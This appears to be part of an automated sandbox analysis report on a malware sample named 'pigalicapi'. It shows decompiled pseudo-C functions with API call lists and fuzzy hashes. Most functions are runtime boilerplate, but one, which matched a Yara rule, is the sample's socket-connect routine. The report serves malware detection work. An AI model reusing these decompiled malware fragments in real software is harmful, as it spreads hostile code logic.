                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: b583911332a4b736d2d81eaeac52af6b8f7661abc9484558ded9f9b4c3b73c07
                                                                                                                                                                                                                                                                            • Instruction ID: 1a78f4d0add1965811f746ff2f9865fd08f0da095c5151e72c190b2eced767db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b583911332a4b736d2d81eaeac52af6b8f7661abc9484558ded9f9b4c3b73c07
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11CE75600549FFCB01EF68C886CDD3BA5EF48350F418055F94D5F262D631DE92AB42
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                                                            			E00C83441(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed char _v15;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void _v24;
                                                                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                                                                            				char _v31;
                                                                                                                                                                                                                                                                            				void _v32;
                                                                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed char* _v52;
                                                                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                                            				int _t86;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            				long _t97;
                                                                                                                                                                                                                                                                            				void _t105;
                                                                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                                                                                                                            				signed char _t123;
                                                                                                                                                                                                                                                                            				signed char _t128;
                                                                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                                                            				signed char* _t133;
                                                                                                                                                                                                                                                                            				intOrPtr* _t135;
                                                                                                                                                                                                                                                                            				signed int _t136;
                                                                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t78 =  *0xd0db44; // 0xce6c4b51
                                                                                                                                                                                                                                                                            				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                                            				_t80 = _a8;
                                                                                                                                                                                                                                                                            				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                                            				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                                            				_t133 = _a12;
                                                                                                                                                                                                                                                                            				_v52 = _t133;
                                                                                                                                                                                                                                                                            				_v48 = _t118;
                                                                                                                                                                                                                                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd0e600 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                                            				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                                            				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                                            				_t135 = _a4;
                                                                                                                                                                                                                                                                            				_v60 = _t86;
                                                                                                                                                                                                                                                                            				 *_t135 = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                                            				while(_t133 < _v40) {
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					_v31 =  *_t133;
                                                                                                                                                                                                                                                                            					_t129 =  *((intOrPtr*)(0xd0e600 + _v48 * 4));
                                                                                                                                                                                                                                                                            					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                                            					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                            						if(( *(E00C79A59(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                                            							_push(_t133);
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                                            								_t131 = _v48;
                                                                                                                                                                                                                                                                            								 *((char*)( *((intOrPtr*)(0xd0e600 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                                            								 *( *((intOrPtr*)(0xd0e600 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xd0e600 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t112 = E00C82A0F( &_v28, _t133, 2);
                                                                                                                                                                                                                                                                            								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                            								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                                            									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                            									goto L9;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                                            						_push(2);
                                                                                                                                                                                                                                                                            						_v15 = _t128;
                                                                                                                                                                                                                                                                            						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                                            						_push( &_v16);
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						_push( &_v28);
                                                                                                                                                                                                                                                                            						_t94 = E00C82A0F();
                                                                                                                                                                                                                                                                            						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                            						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                                                            							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                                            							_v56 = _t97;
                                                                                                                                                                                                                                                                            							if(_t97 != 0) {
                                                                                                                                                                                                                                                                            								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                            									L19:
                                                                                                                                                                                                                                                                            									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                                            									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                                            										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_t105 = 0xd;
                                                                                                                                                                                                                                                                            											_v32 = _t105;
                                                                                                                                                                                                                                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												if(_v36 >= 1) {
                                                                                                                                                                                                                                                                            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                                            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                            													goto L16;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                                                            				return E00C7DE3E(_v8 ^ _t136);
                                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                                            0x00c83449
                                                                                                                                                                                                                                                                            0x00c83450
                                                                                                                                                                                                                                                                            0x00c83453
                                                                                                                                                                                                                                                                            0x00c8345b
                                                                                                                                                                                                                                                                            0x00c8345f
                                                                                                                                                                                                                                                                            0x00c8346b
                                                                                                                                                                                                                                                                            0x00c8346e
                                                                                                                                                                                                                                                                            0x00c83471
                                                                                                                                                                                                                                                                            0x00c83478
                                                                                                                                                                                                                                                                            0x00c83480
                                                                                                                                                                                                                                                                            0x00c83483
                                                                                                                                                                                                                                                                            0x00c83489
                                                                                                                                                                                                                                                                            0x00c8348f
                                                                                                                                                                                                                                                                            0x00c83494
                                                                                                                                                                                                                                                                            0x00c83496
                                                                                                                                                                                                                                                                            0x00c83499
                                                                                                                                                                                                                                                                            0x00c8349e
                                                                                                                                                                                                                                                                            0x00c834a8
                                                                                                                                                                                                                                                                            0x00c834af
                                                                                                                                                                                                                                                                            0x00c834b2
                                                                                                                                                                                                                                                                            0x00c834b9
                                                                                                                                                                                                                                                                            0x00c834c0
                                                                                                                                                                                                                                                                            0x00c834ec
                                                                                                                                                                                                                                                                            0x00c83512
                                                                                                                                                                                                                                                                            0x00c83514
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c834ee
                                                                                                                                                                                                                                                                            0x00c834f1
                                                                                                                                                                                                                                                                            0x00c835b8
                                                                                                                                                                                                                                                                            0x00c835c4
                                                                                                                                                                                                                                                                            0x00c835cf
                                                                                                                                                                                                                                                                            0x00c835d4
                                                                                                                                                                                                                                                                            0x00c834f7
                                                                                                                                                                                                                                                                            0x00c834fe
                                                                                                                                                                                                                                                                            0x00c83503
                                                                                                                                                                                                                                                                            0x00c83509
                                                                                                                                                                                                                                                                            0x00c8350f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c8350f
                                                                                                                                                                                                                                                                            0x00c83509
                                                                                                                                                                                                                                                                            0x00c834f1
                                                                                                                                                                                                                                                                            0x00c834c2
                                                                                                                                                                                                                                                                            0x00c834c6
                                                                                                                                                                                                                                                                            0x00c834c9
                                                                                                                                                                                                                                                                            0x00c834cf
                                                                                                                                                                                                                                                                            0x00c834d1
                                                                                                                                                                                                                                                                            0x00c834d4
                                                                                                                                                                                                                                                                            0x00c834d8
                                                                                                                                                                                                                                                                            0x00c83515
                                                                                                                                                                                                                                                                            0x00c83518
                                                                                                                                                                                                                                                                            0x00c83519
                                                                                                                                                                                                                                                                            0x00c8351e
                                                                                                                                                                                                                                                                            0x00c83524
                                                                                                                                                                                                                                                                            0x00c8352a
                                                                                                                                                                                                                                                                            0x00c83539
                                                                                                                                                                                                                                                                            0x00c8353f
                                                                                                                                                                                                                                                                            0x00c83545
                                                                                                                                                                                                                                                                            0x00c8354a
                                                                                                                                                                                                                                                                            0x00c83566
                                                                                                                                                                                                                                                                            0x00c835d9
                                                                                                                                                                                                                                                                            0x00c835df
                                                                                                                                                                                                                                                                            0x00c83568
                                                                                                                                                                                                                                                                            0x00c83570
                                                                                                                                                                                                                                                                            0x00c83579
                                                                                                                                                                                                                                                                            0x00c8357f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c83581
                                                                                                                                                                                                                                                                            0x00c83583
                                                                                                                                                                                                                                                                            0x00c83586
                                                                                                                                                                                                                                                                            0x00c8359f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c835a1
                                                                                                                                                                                                                                                                            0x00c835a5
                                                                                                                                                                                                                                                                            0x00c835a7
                                                                                                                                                                                                                                                                            0x00c835aa
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c835aa
                                                                                                                                                                                                                                                                            0x00c835a5
                                                                                                                                                                                                                                                                            0x00c8359f
                                                                                                                                                                                                                                                                            0x00c8357f
                                                                                                                                                                                                                                                                            0x00c83579
                                                                                                                                                                                                                                                                            0x00c83566
                                                                                                                                                                                                                                                                            0x00c8354a
                                                                                                                                                                                                                                                                            0x00c83524
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c835ad
                                                                                                                                                                                                                                                                            0x00c835ad
                                                                                                                                                                                                                                                                            0x00c835e1
                                                                                                                                                                                                                                                                            0x00c835f3

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00C83BB6,?,00000000,?,00000000,00000000), ref: 00C83483
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C834FE
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C83519
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C8353F
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00C83BB6,00000000,?,?,?,?,?,?,?,?,?,00C83BB6,?), ref: 00C8355E
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00C83BB6,00000000,?,?,?,?,?,?,?,?,?,00C83BB6,?), ref: 00C83597
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                            • Opcode ID: b3f4770aaad6c7c10add12573ba6ed2632b85095b2d2302f18d7337bc7a86ba7
                                                                                                                                                                                                                                                                            • Instruction ID: 500ee5f76b1cee855ae42f4420b3344ab4eae176acdbdc00c69914cb6d745253
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3f4770aaad6c7c10add12573ba6ed2632b85095b2d2302f18d7337bc7a86ba7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 535106B0A002499FDB10DFA8D885BEEBBF8FF09704F14451AE956E7291E7309B41CB64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                            			E0117A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                            				signed char _v8;
                                                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                                                            				signed char _v13;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				short _v34;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				char* _t42;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(6);
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				_push(2);
                                                                                                                                                                                                                                                                            				L0117B210();
                                                                                                                                                                                                                                                                            				_v20 = __eax;
                                                                                                                                                                                                                                                                            				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_v36 = 2;
                                                                                                                                                                                                                                                                            					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					L0117B20A();
                                                                                                                                                                                                                                                                            					_v34 = 2;
                                                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                                                            					L0117B204();
                                                                                                                                                                                                                                                                            					_v12 = 2;
                                                                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                                                                            						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					_v13 = 0;
                                                                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                                                                            					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                            						_push(0x10);
                                                                                                                                                                                                                                                                            						_t42 =  &_v36;
                                                                                                                                                                                                                                                                            						_push(_t42);
                                                                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                                                                            						L0117B1FE();
                                                                                                                                                                                                                                                                            						if(_t42 != 0) {
                                                                                                                                                                                                                                                                            							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v13 = 1;
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if(_a16 != 0) {
                                                                                                                                                                                                                                                                            							_v44 = _a16;
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1005);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20);
                                                                                                                                                                                                                                                                            							L0117B1F2();
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1006);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20);
                                                                                                                                                                                                                                                                            							L0117B1F2();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _v20;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t40 = _v20;
                                                                                                                                                                                                                                                                            					_push(_t40);
                                                                                                                                                                                                                                                                            					L0117B1F8();
                                                                                                                                                                                                                                                                            					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v20;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x0117a096
                                                                                                                                                                                                                                                                            0x0117a098
                                                                                                                                                                                                                                                                            0x0117a09a
                                                                                                                                                                                                                                                                            0x0117a09c
                                                                                                                                                                                                                                                                            0x0117a0a1
                                                                                                                                                                                                                                                                            0x0117a0a8
                                                                                                                                                                                                                                                                            0x0117a0b7
                                                                                                                                                                                                                                                                            0x0117a0bf
                                                                                                                                                                                                                                                                            0x0117a0c0
                                                                                                                                                                                                                                                                            0x0117a0c5
                                                                                                                                                                                                                                                                            0x0117a0cc
                                                                                                                                                                                                                                                                            0x0117a0cd
                                                                                                                                                                                                                                                                            0x0117a0d2
                                                                                                                                                                                                                                                                            0x0117a0d9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a0ea
                                                                                                                                                                                                                                                                            0x0117a0e5
                                                                                                                                                                                                                                                                            0x0117a0f2
                                                                                                                                                                                                                                                                            0x0117a0f9
                                                                                                                                                                                                                                                                            0x0117a0fd
                                                                                                                                                                                                                                                                            0x0117a10f
                                                                                                                                                                                                                                                                            0x0117a117
                                                                                                                                                                                                                                                                            0x0117a119
                                                                                                                                                                                                                                                                            0x0117a11c
                                                                                                                                                                                                                                                                            0x0117a120
                                                                                                                                                                                                                                                                            0x0117a121
                                                                                                                                                                                                                                                                            0x0117a128
                                                                                                                                                                                                                                                                            0x0117a10c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a10c
                                                                                                                                                                                                                                                                            0x0117a12a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a12a
                                                                                                                                                                                                                                                                            0x0117a138
                                                                                                                                                                                                                                                                            0x0117a14c
                                                                                                                                                                                                                                                                            0x0117a151
                                                                                                                                                                                                                                                                            0x0117a154
                                                                                                                                                                                                                                                                            0x0117a159
                                                                                                                                                                                                                                                                            0x0117a15a
                                                                                                                                                                                                                                                                            0x0117a15f
                                                                                                                                                                                                                                                                            0x0117a167
                                                                                                                                                                                                                                                                            0x0117a168
                                                                                                                                                                                                                                                                            0x0117a16d
                                                                                                                                                                                                                                                                            0x0117a172
                                                                                                                                                                                                                                                                            0x0117a173
                                                                                                                                                                                                                                                                            0x0117a178
                                                                                                                                                                                                                                                                            0x0117a180
                                                                                                                                                                                                                                                                            0x0117a181
                                                                                                                                                                                                                                                                            0x0117a181
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a186
                                                                                                                                                                                                                                                                            0x0117a13a
                                                                                                                                                                                                                                                                            0x0117a13d
                                                                                                                                                                                                                                                                            0x0117a13e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117a143
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0117A09C
                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 0117A0C0
                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 0117A0CD
                                                                                                                                                                                                                                                                            • connect.WS2_32(000000FF,?,00000010), ref: 0117A121
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 0117A13E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 530611402-0
                                                                                                                                                                                                                                                                            • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                            • Instruction ID: 455ce045a3b877682bc6740b0d222d7e9e84572179d5e2415e9e2dfd20bce4dd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27317070A44219EBEB18EFA4E845BFEB776BF18314F148649E5216B3C0D3B49940CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C7BE58(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t45 = _a4;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45, 7);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                                            					E00C7BE1C(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                                            					return E00C7A8FB( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00c7be5e
                                                                                                                                                                                                                                                                            0x00c7be63
                                                                                                                                                                                                                                                                            0x00c7be6c
                                                                                                                                                                                                                                                                            0x00c7be77
                                                                                                                                                                                                                                                                            0x00c7be82
                                                                                                                                                                                                                                                                            0x00c7be8d
                                                                                                                                                                                                                                                                            0x00c7be9b
                                                                                                                                                                                                                                                                            0x00c7bea6
                                                                                                                                                                                                                                                                            0x00c7beb1
                                                                                                                                                                                                                                                                            0x00c7bebc
                                                                                                                                                                                                                                                                            0x00c7beca
                                                                                                                                                                                                                                                                            0x00c7bed8
                                                                                                                                                                                                                                                                            0x00c7bee9
                                                                                                                                                                                                                                                                            0x00c7bef7
                                                                                                                                                                                                                                                                            0x00c7bf05
                                                                                                                                                                                                                                                                            0x00c7bf10
                                                                                                                                                                                                                                                                            0x00c7bf1b
                                                                                                                                                                                                                                                                            0x00c7bf26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7bf36
                                                                                                                                                                                                                                                                            0x00c7bf3b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BE1C: _free.LIBCMT ref: 00C7BE45
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BEA6
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: HeapFree.KERNEL32(00000000,00000000,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?), ref: 00C7A911
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: GetLastError.KERNEL32(?,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?,?), ref: 00C7A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BEB1
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BEBC
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BF10
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BF1B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BF26
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BF31
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
